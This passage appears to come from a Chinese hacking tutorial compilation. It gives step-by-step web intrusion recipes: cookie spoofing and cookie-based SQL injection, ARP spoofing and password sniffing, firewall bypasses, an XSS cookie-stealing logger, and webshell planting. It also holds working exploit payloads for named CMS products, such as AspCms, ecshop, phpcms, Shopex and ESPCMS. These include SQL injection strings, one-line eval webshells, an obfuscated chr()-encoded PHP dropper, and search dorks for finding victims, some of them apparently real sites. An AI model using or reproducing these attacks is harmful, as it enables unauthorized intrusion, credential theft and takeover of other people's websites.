接下来打开，把双引号里棉的数据“X-Forwarded-For: 127.0.0.2′,group_id = 1 where loginname = ‘会员的帐号’#” 放在Content-Length：的下面。
在看到最底下的loginname=这行代码，把最后面的验证码改成当前会员登陆的验证码，然后将nc\1.txt 放在同一个目录下，cmd命令：nc 域名 80<1.txt
成功提交上去后，刚才的会员帐户将变成管理员帐户了，找到该站的后台地址登录即可实现cookie欺骗！

=================================================================================================================================================

【 cookie欺骗 】
当我们通过注入或是社工把管理员的帐号跟md5密码搞到手的时候，却发现激活成功教程不出密码 (MD5是16位加密的)
那么我们就可以用COOKIE欺骗来绕过，利用桂林老兵的cookie欺骗工具，把自己的ID以及md5密码都修改成管理员的，再修改cookie，访问时就会实现欺骗了。

=================================================================================================================================================

【 cookie中转突破防注入 】
有时检测一个网站，系统会弹出一些SQL防注入的提示框，这时我们可以利用COOKIE中转注入来进行突破，首先准备一个webshell，然后打开COOKIE中转工具。
复制注入点到“注入URL地址跟来源页”处，把问号去掉，再把问号后面的ID=剪切到“注入键名”里，再把ID=后面那个参数剪切到“POST提交值”里替换jmdcw=后面的参数。
点击生成，再把生成的文件上传到webshell里，然后访问路径，再页面地址后面加“?jmdcw=参数”，这样搭建构造出来的注入点就绕过防注入了！
以上是在webshell里搭建ASP坏境的方法，下面的是本地架设ASP环境的方法：
利用简易IIS服务器搭建一个环境，再将COOKIE中转生成的文件放到简易IIS服务器的目录下！然后运行简易IIS服务器，在后面+文件名+问号+jmdcw=参数即可。

=================================================================================================================================================

【 cookie手工突破防注入 】
第一种方法：
用 and 1=1 and 1=2 检测网站是否存在注入点时，如果提示你的IP已被记录，就说明系统做了防注入措施，可以用代码来突破。
管理员只过滤了and，但是没有过滤or，我们可以先猜网站的字段数 格式：order by 数字  猜到错为止，然后选前一个对的数字！
比如猜到14错误，那就是13了，然后利用Cookie提交变量值，代码：javascript:alert(document.cookie=id=”+escape(“这里填写变量值，例如：id=408”));
开始猜解表段，代码：javascript:alert(document.cookie=”id=”+escape(“变量值 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin”));
复制在浏览器里打开，将出现一个提示框，点击确定就会注射进去，再重新打开网站（要在此处打开，所以前面最好复制下网站地址）
然后就会出现两个提示数字，比如5跟6，然后在代码的5跟6处猜帐号密码，常见的帐号有：user  username  密码:pass  password
复制修改后的代码放到浏览器里打开，就会爆破出网站的帐号密码了。

第二种方法：
注入点：http://www.XXXXXXXX.gov.cn/shownews.asp?id=4098
首先把?id=408去掉，然后访问如果提示“数据库出错”！就说明网站没有过滤Cookie提交方式，可以利用Cookie欺骗绕过防注入！
利用Cookie提交变量值，代码：javascript:alert(document.cookie=”id=”+escape(“4098”)
下面开始在Cookie注入中执行常规注入攻击，提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and 1=1”));
访问http://www.XXXXXXXX.gov.cn/shownews.asp 显示正常页面，
再提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and 1=2”));  显示错误页面！
下面来开始猜解表段，提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select * from 表段)”))；
接着猜字段，提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select 字段 from admin)”))；  例如：username
接着猜字段，提交代码：javascript:alert(document.cookie=”id=”+escape(“4098 and exists (select 字段 from admin)”)),   例如：password
下面开始猜字段数跟字段内容了，提交代码:javascript:alert(document.cookie=”id=”+escape(“4098 and 1=2 union select 1,2,3,4,5,6 from 表段”));
一直猜解到对为止，这里只是猜到6，记得继续加减！猜解到对的时候，页面会出现数字，然后在相对应的数字替换字段名，再进行提交代码！
这时如果字段名猜对的话，就会爆出帐号密码了，不对的话继续替换字段名，位置不变！（存在cookie注入时建议参考mysql手工注入的语句）

=================================================================================================================================================

【 伪静态注入 】
伪静态网站注入方法，莱鸟扫盲来了哦，通常情况下，动态脚本的网站的url类似下面这样：
http://www.91ri.org/news.php?id=111
做了伪静态之后就成这样了：
http://www.91ri.org/news.php/id/111.html
以斜杠“/”代替了“=”并在最后加上.html，这样一来，就无法直接用工具来注入了。
常规的伪静态页面如下：http://www.XXX.com/play/Diablo.html
例如关联的动态页面是game.php ，那么当用户访问后程序会自动转换成类似http://www.XXX.com/game.php?action=play&name=Diablo 的形式
注入点检测可以用：http://www.XXX.com/play/Diablo’ and 1=’1.html与http://www.XXX.com/play/Diablo’ and 1=’2.html来判断
通常情况下，动态脚本的网站的url类似下面这样：http://www.xxoo.net/aa.php?id=123
做了伪静态之后类似这样：http://www.xxoo.net/aa.php/id/123.html 以斜杠“/”代替了“=”并在最后加上.html，这样一来，就无法直接用工具来注入了！

=================================================================================================================================================
【 嗅探 】
当入侵一个网站，该网站没有任何漏洞的情况下，可以进行旁注，再提权拿下任意一台服务器，不行的话就C段，提权拿下任意一台服务器。
只要能拿下同网段的任意一台服务器，就可以使用C段嗅探来获取主站的帐号密码，cain是一款强大的劫持工具。
在服务器里安装cain后打开主控端，点击配置->选择服务器IP一项->在路由追踪一项取消全部->确定。
设置完毕后点击一下激动按钮(中间那个)，再点击嗅探器，点击加号符号，选择所有在子网主机，选择ARP测试(传播 31-位)，确定。
扫描完毕选择网关一项，点击ARP，点击加号符号，左边选择网关，右边选择全部的C段，确定，点击开始嗅探按钮(第三个)，嗅探到的帐号密码在口令一项展现！
如果发现没数据可以使用幻境网盾来限制网速，让cain的发包快过防火墙。

=================================================================================================================================================

【 arp欺骗 】
只要该服务器存在C段，都可以尝试arp欺骗，用到的工具是NetFuke，想知道arp劫持能不能成功，cmd命令：arp -a  看一下，动态的服务器IP就能成功，静态的就不能。
安装完运行主控端，设置–嗅探设置–网卡选择服务器的IP–控制选项选择“启用ARP欺骗、启用过滤器、启用分析器、启用修改器、主动转发” 确定。
设置–ARP欺骗–双向欺骗–来源Ip填服务器的网关–中间人IP填服务器的IP–目标IP填要欺骗的任意C段ip(用御剑扫描C段)–确定。
插件管理–修改器–最后一个选项双击–在右边的HTML Body = [haha!!] 填写自己要展现的文字，点击开始即可欺骗成功！

=================================================================================================================================================

【 突破安全狗防注入及上传 】
写入webshell 写不进去，平常的一句话 也失效，用这段代码：
<%@ Page Language=”C#” ValidateRequest=”false” %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies[“admin163.net”].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>
连接端用cncert的aspx一句话客户端

2、IIS6.0解析漏洞遇到安全狗

文件名为http://www.baicai.com/1.asp;1.jpg
这样的会被IIS安全狗果断屏蔽

改成如下名称,IIS6一样会解析:
www.baicai.com/;1.asp;1.jpg
3、安全狗的注入绕过

常用的如baicai.asp?id=1 and 1=1 是会被安全狗屏蔽的。
但这样就可以突破了：
baicai.asp?0day5.com=%00.&id=69%20 and 1=1
=================================================================================================================================================

【 跨站xss 】
在网站留言或者能输入信息的地方提交跨站代码，从而盗取管理员cookie，然后用cookie浏览器直接进入后台，将以下代码保存为asp文件，例如1.asp
   
<%
thisfile=Server.MapPath(“cookie.txt”)
msg=Request(“msg”)
set fs=server.CreateObject(“scripting.filesystemobject”)
set thisfile=fs.OpenTextFile(thisfile,8,True,0)
thisfile.WriteLine(“=======cookie:”&msg&”======by:剑眉大侠”)
thisfile.close
set fs=nothing
%>
首先搭建一个asp环境，推荐使用“ASP服务器（摆脱安装IIS）” 再将1.asp放在wwwroot目录下，访问1.asp文件如果提示下载，则说明搭建成功了。
然后在留言板的“您的网站”一处输入：<script>doucument.location=’http://127.0.0.1/1.asp?msg=’document.cookie</script>
当管理员浏览我们提交的留言时，将在wwwroot目录下生成一个cookie.txt文件，这时我们只要访问cookie.txt这个文件，就能知道管理员的cookie是多少了！
然后再使用桂林老兵的cookie欺骗工具或是网页源代码查看分析器，访问网站再输入cookie进行欺骗登录即可！（填cookei的时候记得选择自定义）
小技巧：要想让管理员早点浏览你提交的留言，可以通过打电话，QQ客服等去社工他即可。

=================================================================================================================================================

【 爆库 】
%5C为十六进制的\符号，而数据库大于5.0就可以爆库，若一个网站数据库大于5.0，且是ACESS数据库，若不能注入的注入点是：http://www.xxx.com/rpc/show24.asp?id=127
我们直接把%5C加到rpc后面，因为%5C是爆二级目录，所以应该是这样，http://www.xxx.com/rpc%5c/show24.asp?id=127
而%23是代表#，如果管理员为了防止他人非法下载数据库，而把数据库改成#database.mdb,这样防止了。
如果页面地址为：http://www.xx.com/rpd/#database.mdb ; 把%23替换#就可以下载了，即：http://www.xx.com/rpd/%23database.mdb
还有利用默认的数据库路径 http://www.xxx.com/ 后面加上 conn.asp 如果没有修改默认的数据库路径，也可以得到数据库的路径（注意：这里的/也要换成%5c）
如果你能看到：’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确，以及是否连接到文件存放的服务器。
这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
=================================================================================================================================================

【 利用sql注入点判断网站和数据库是否站库分离 】
在注入点后加上：and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end)))  
注意admin一定要是存在的表段，如果返回正常，说明网站和数据库是在同一服务器，如果不正常则说明是站库分离的。
=================================================================================================================================================

【 iis6.0 PUT写入漏洞 】
利用工具：IIS PUT Scaner、桂林老兵IIS写权限利用程序
1、IIS来宾用户对网站文件夹有写入权限
2、web服务器扩展力设置webDAV为允许，即：WebDAV—打勾
3、网站主目录:写入—打勾(可PUT)
4、网站主目录:脚本资源访问—打勾（可COPY、MOVE）
大家都清楚，写权限就是允许PUT，与网站自身运行的权限无丝毫联系，如果开启了，就是没有一点安全意识，就给我们提供了大大的方便。
首先用御剑工具扫下C段，比如：12.12.12.1 – 12.12.12.255  打开IIS PUT Scaner，把12.12.12.1放在Start IP 这里，12.12.12.255放在End IP 这里，
接着在Port这里，换成80，点击Scan开始嗅探，当PUT这里显示是Yes就说明存在漏洞，可以右键选择PUT file，输入文件名1.txt，下面填内容，保存就可以写入了。
或是利用“桂林老兵IIS写权限利用程序”也可以，这款工具比较强大，把域名填写进去，例如：www.xxx.com，然后在请求文件那里输入你的文件名，
在数据包格式那里选择PUT，有的会直接弹出浏览文件框，没有就自己选择，在下面，然后点击提交数据库即可，一般是先PUT一个txt文件，再MOVE成asp木马。
直接提交asp木马的话，如果MOVE方法不行，可以试试Copy。
=================================================================================================================================================

【 ACCESS执行SQL语句导出一句话拿webshell 】
原理大致和php网站的outfile差不多，在access后台其他方法不能拿到webshell，但是后台有SQL语句查询执行，就可以直接access导出一句话拿webshell了。

不过需要知道物理路径才能导出，利用IIS的解析漏洞导出EXCEL文件拿到webshell，因为ACCESS数据库不允许导出其他危险格式，我们导出为EXCEL后在利用IIS解析漏洞就可以变成我们的木马了。
点“服务器信息探测”，获得网站路径：e:\web\webshellcc\的EXCEL 点“系统管理”-》“自定义执行SQL”，试一下，能够执行的话可以用access导一句话拿下shell。
create table cmd (a varchar(50))  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50

insert into cmd (a) values (‘<%execute request(chr(35))%>’)  在表cmd的a字段插入密码为#的一句话木马
select * into [a] in ‘e:\web\webshellcc\1.asa;x.xls’ ‘excel 4.0;’ from cmd  把cmd表a的内容导出到路径e:\web\webshellcc\的EXCEL文件
drop table cmd  删除建立的cmd表
菜刀连接：http://www.xxx.com/1.asa;x.xls
=================================================================================================================================================

【 利用过滤’or’=’or’修改代码进行绕过 】
例如后台地址是：http://www.hdminc.net/admin/admin_index.asp
当用万能密码登录的时候，会出现一些过滤or的提示！
请右键查看源文件，另存为桌面 XX.html，然后打开找到以下这段代码，进行删除！
<script language=”javascript”>
function chencklogin()
{

  if(document.login.username.value==”)
     {alert(‘请输入用户名’);
      document.login.username.focus();
      return false
    }
  if (document.login.password.value==”)
   {alert(‘请输入密码’);
    document.login.password.focus();
    return false
   }
}
</script>
注意：将以下段代码中的 “index.asp?action=chkadmin” 修改为 “http://www.hdminc.net/admin/admin_index.asp”
<form action=”index.asp?action=chkadmin” name=”login” method=”past” οnsubmit=return checklogin();”>
最后保存打开，再用’or’=’or’登录时，系统已不再过滤，结果就能用万能密码登录进去了！

=================================================================================================================================================

【 动力3.5拿shell 】inurl:printpage.asp?ArticleID=
1.找到版权信息，把内容替换成：
版权所有 Copyright? 2003 <a href=’http://www.asp163.net’>动力空间</a>” ‘版权信息
if Request(“xiaoxin”)=”520″ then
dim allen,creat,text,thisline,path
if Request(“creat”)=”yes” then
Set fs = CreateObject(“Scripting.FileSystemObject”)
Set outfile=fs.CreateTextFile(server.mappath(Request(“path”)))
outfile.WriteLine Request(“text”)
Response.write “小新恭喜”
end if
Response.write “<form method=’POST’action='”&Request.ServerVariables(“URL”)&”?xiaoxin=520&creat=yes’>”
Response.write “<textarea name=’text’>”&thisline&”</textarea><br>”
Response.write “<input type=’text’ name=’path’ value='”&Request(“path”)&”‘>”
Response.write “<input name=’submit’ type=’submit’ value=’ok’ ></form>”
Response.end
end if
%>
2.然后保存，千万别跳转任何页面，直接在IE地址栏内将 admin/Admin_Login.asp 替换成 inc/config.asp?xiaoxin=520
3.成功后会进入一个像小马一样的页面，粘贴木马代码以及写上木马文件名即可拿到wshell，木马在inc目录。
=================================================================================================================================================

【 动易cms拿shell 】
点击网站配置，在网站名称后面插入一句话木马，连接inc/config.asp
=================================================================================================================================================

【 aspcms】
简要描述：后台文件AspCms_AboutEdit.asp 未进行验证，且未过滤，导致SQL注入。
爆帐号密码：
admin/_content/_About/AspCms_AboutEdit.asp?id=1 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1
版本不同需要更改值。

第二种方法，找到后台，然后/admin/_system/AspCms_SiteSetting.asp?action=saves
直接POST
[php]runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0

&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&

waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn

&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1

&LanguageID=1[/php]

再连接配置文件config.asp 密码为#

老版本中可以通过添加模板直接添加asp.但是新版已经限制了添加模板的格式为html,js,css
当然如果是遇到iis6的话还是可以通过iis6的解析漏洞把文件名改成1.asp;.html这样的格式来拿到shell的.
方法：点击“界面风格”，然后选“编辑模板/CSS文件”，然后“添加模板”，文件名称写error.asp;.html，文件内容写一句话<%eval request(“g”)%>
然后添加，会提示添加成功，然后在模板列表中就可以找到我们添加的一句话了，用菜刀连接即可！
可是如果遇到iis7.5呢? 以下是本人自己找到挖掘到的aspcms通杀版本的后台拿shell方法.
1、进入后台，“扩展功能”–“幻灯片设置”–”幻灯样式”
2、使用chorme的审查元素功能或者firefox的firebug，总之使用能修改当前页面元素的工具就好了，将对应的slidestyle的value的值修改为1%><%Eval(Request (chr(65)))%><%
3、一句话木马，密码a。在/config/AspCms_Config.asp

=================================================================================================================================================

【 XYCMS企业建站系统 】
关键词：inurl:showkbxx.asp?id=
默认数据库：data/xy#!123.mdb
默认账户密码：admin admin
找到网站配置，在网站名称里面直接插入一句话：网站”%><%eval request(“x”)%><%’，注意不要删掉网站名称！然后中国菜刀连接：/inc/config.asp
或是找到网站地址，在http://后面加上一句话木马，然后菜刀链接配置文件：inc/config.asp
=================================================================================================================================================

【 szwyadmin漏洞绕过后台验证 】
关键字:inurl:szwyadmin/login.asp
javascript:alert(document.cookie=”adminuser=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”adminpass=”+escape(“‘or’=’or'”));javascript:alert(document.cookie=”admindj=”+escape(“1”));
1.后台一般存在一个szwyadmin文件夹，复制一下后台地址放在一边，之后复制代码替换后台地址访问进行注射！
2.这时会弹出一个窗口，连续点击三次确定。
3.重新访问后台地址，把网站后面的/login.asp 换成 admin_index.asp 奇迹般的直接进入后台了！
=================================================================================================================================================

【 医院建站系统任意文件上传漏洞 】
关键词：inurl:cms/Column.aspx?
关键词：inurl:cms/Column.aspx?LMID=
漏洞利用 ：xtwh/upfile.aspx
直接上传aspx木马拿shell。

=================================================================================================================================================

【 Struts 2远程执行命令漏洞 】
struts 2一种java-web的MVC框架技术，和传统的struts1有很大的改进。
严格来说，这其实是XWork的漏洞，因为Struts 2的核心使用的是WebWork，而WebWork又是使用XWork来处理action的。
关键词：inurl:common/common_info.action?wid=
http://www.xxxxx.com/xxx.action 一般页面以.action结尾的几乎都存在这个漏洞，可以用工具检测一下就知道了。
这个漏洞是在Java运行环境下利用的，Java运行环境下载地址：http://www.xxx.com/Soft/12080.html

=================================================================================================================================================

【 嘉友科技cms上传漏洞 】
谷歌关键字：inurl:newslist.asp?NodeCode=
程序采用的上传页uploadfile.asp未进行管理验证，导致建立畸形目录上传图片木马获取shell漏洞。
exp：ploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

他原上传目录是:uploadfile.asp?uppath=PicPath&upname=&uptext=form1.PicPath

而且他的上传文件没有过滤导致未授权访问，直接上传小马，然后小马后面写为1.jpg  访问路径 查看源代码。
=================================================================================================================================================

【 ecshopcms后台拿shell 】
支持最新2.7.2版本，通杀最新版本后台低权限！
<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62); $a=chr(119); $fp=@fopen($filen,$a); $msg=@fwrite($fp,$filec); if($msg) echo chr(79).chr(75).chr(33); @fclose($fp); ?>
后台-订单管理-订单打印-选择源代码编辑-保存-返回订单列表，随意选择一个订单打印，返回OK，生成一句话成功-在根目录生成了一个null.php，一句话密码：usb
=================================================================================================================================================

【 phpcms2008版本 直接执行php代码漏洞 】
关键字：inurl:yp/product.php
exp代码：pagesize=${${@eval_r($_POST[cmd])}}
测试网站：http://www.slsdgc.com.cn/yp/product.php?catid=721
利用方法：http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}
菜刀连接：http://www.slsdgc.com.cn/yp/product.php?pagesize=${${@eval_r($_POST[cmd])}}  密码cmd
菜刀连接注意以下格式：
   默认级别                    php                       gb2312
=================================================================================================================================================

【 教育站sql注入通杀0day 】
关键词：inurl:info_Print.asp?ArticleID=
默认后台：website/ad_login.asp
比如：http://www.psfshl.pudong-edu.sh.asp?ArticleID=1650
加上：union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
这样就直接得到了管理员账户和经过Md5加密的密码了。
=================================================================================================================================================

【 IIS7.0 畸形解析漏洞通杀oday 】
找到某个使用IIS7.0架设的站，然后找到其中的图片上传点（不需要管理权限，普通注册用户即可搞定），把PHP一句话图片木马缀改成.jpg，传上去，得到图片地址。
在图片格式后面添加xx.php xx随便你怎么填，只要后缀为.php就好，之后菜刀连接即可！

=================================================================================================================================================

【 Yothcms 遍历目录漏洞 】
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
默认后台：admin/login.asp
遍历目录：ewebeditor/manage/upload.asp?id=1&dir=../
数据库路径：%23da%23ta%23\%23db_%23data%23%23.asa
=================================================================================================================================================

【 传信网络独立开发网站源码0day漏洞 】
默认后台：system/login.asp
编辑器后台路径：ubbcode/admin_login.asp
数据库路径：ubbcode/db/ewebeditor.mdb
默认账号密码：yzm   111111

=================================================================================================================================================
科讯cms 6.5后台拿shell 】
1.可以在数据库备份中找到网站的绝对路径
2.利用科讯SQL注入漏洞利用工具也能找到

进入后台后执行sql命令：
create table E:\wenxiushi\wz001\\KS_Data\Collect\KS_Collect.Mdb.cmd  (a varchar(50))
insert into E:\wenxiushi\wz001\KS_Data\Collect\KS_Collect.Mdb.cmd  (a) values (‘┼攠數畣整爠煥敵瑳∨∣┩愾’)
接着数据库备份成1.asp  菜刀连接密码：#

=================================================================================================================================================

【 动易2006后台拿shell 】
进入后台后，我们在左边菜单栏中选择“系统设置”，然后在出现的菜单栏里选择“自定义页面管理”，
接着需要先添加一个自定义页面分类，选择“添加自定义分类”这个选项，分类名称与分类简介都可以随便填写。填写完毕后选择“添加”，系统提示添加成功。
下面再来选择“添加自定义页面”，“页面名称”随便输入，“所属分类”就是刚才建立的分类就可以了。“页面类型”和“页面路径”都不用管，保持默认.
不过如果没有改页面路径的话，默认生成的文件是在根目录下的，也就是http://www.xx.com/maer.asp.“文件名称”即输入生成的木马的文件名。
“页面简介”也不用管，下面就是页面内容了。这里填入小马的代码。一切完毕点击“添加”会提示保存自定义页面成功。最后一步是要生成我们的木马页面。
选择“自定义页面管理首页”，点击右边出现的“生成本页”就OK 了，成功获得动易的shell。
=================================================================================================================================================

【 Shopex4.8.5 注入漏洞后台拿shell 】
关键词：powered by shopex v4.8.5
exp:
<html>  
<head>  
<title>Shopex 4.8.5 SQL Injection Exp</title>  
</head>  
<body>  
<h2>Shopex 4.8.5 SQL Injection Exp (product-gnotify)</h2>  
<form action=”http://www.lpboke.com/?product-gnotify” method=”post” name=”submit_url”>  
        <input type=”hidden” name=”goods[goods_id]” value=”3″>  
        <input type=”hidden” name=”goods[product_id]” value=”1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators”>  
        <input type=”submit” value=””>  
</form>  
fuck
<body>  
</html>  

保存为html格式，替换代码中的网站，本地打开后点击小图标，出现新页面，帐号密码爆出来了，默认后台：shopadmin
拿shell方法….
第一步 页面管理 修改模版 然后选一个XML编辑
开始用 live http 抓包 你们懂的 然后把第一个POST包给抓出来
然后改包 id=1273923028-info.xml&tmpid=1273923028&name=index_temp.php&file_source=
解释一下 id是你选择的模版文件夹名称 后面的info.xml 是你修改的XML文件 tmpid= 你们懂的 就是模版文件夹 然后 name 是你提交的文件名字 file_source 是后门或者shel
我这里是一句话 你们懂的 然后提交了之后 地址是这样的http://Madman.in/themes/文件名称/你的木马名称
=============================================================================================================================================================

【 ecshop漏洞总汇 】
关键字：powered by ecshop

普通代码：user.php?act=order_query&order_sn=’ union select 1，2，3，4，5，6，concat(user_name，0x7c，password，0x7c，email)，8 from ecs_admin_user/*

变种代码：search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319
直接在网站后台加入代码回车就能爆出帐号密码，再去掉代码加上/admin回车就能直接进后台了。

拿shell方法很简单，找到“库项目管理”再选择“配送的方式”，在代码最下面插入php一句话木马：<?php eval($_POST[x]);?> 不行就换php木马的预代码！
接着保存，一句话路径是：http://www.xxx.org/myship.php ; 打开“ASP+PHP两用Shell.html”填入地址，点击一下环境变量，成功之后点击上传文件就可以拿shell了。

=================================================================================================================================================

【 ESPCMS通杀0day 】
关键字：inurl:index.php?ac=article&at=read&did=
默认后台：adminsoft/index.php 或者 admin/
注入点(爆表前缀，比如：cm_admin……前缀就是cm，后面3个代码要自行替换):
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆用户名：
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23
爆密码：
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((sele

[email=2″οnmοuseοver=”alert(2)]2[/email]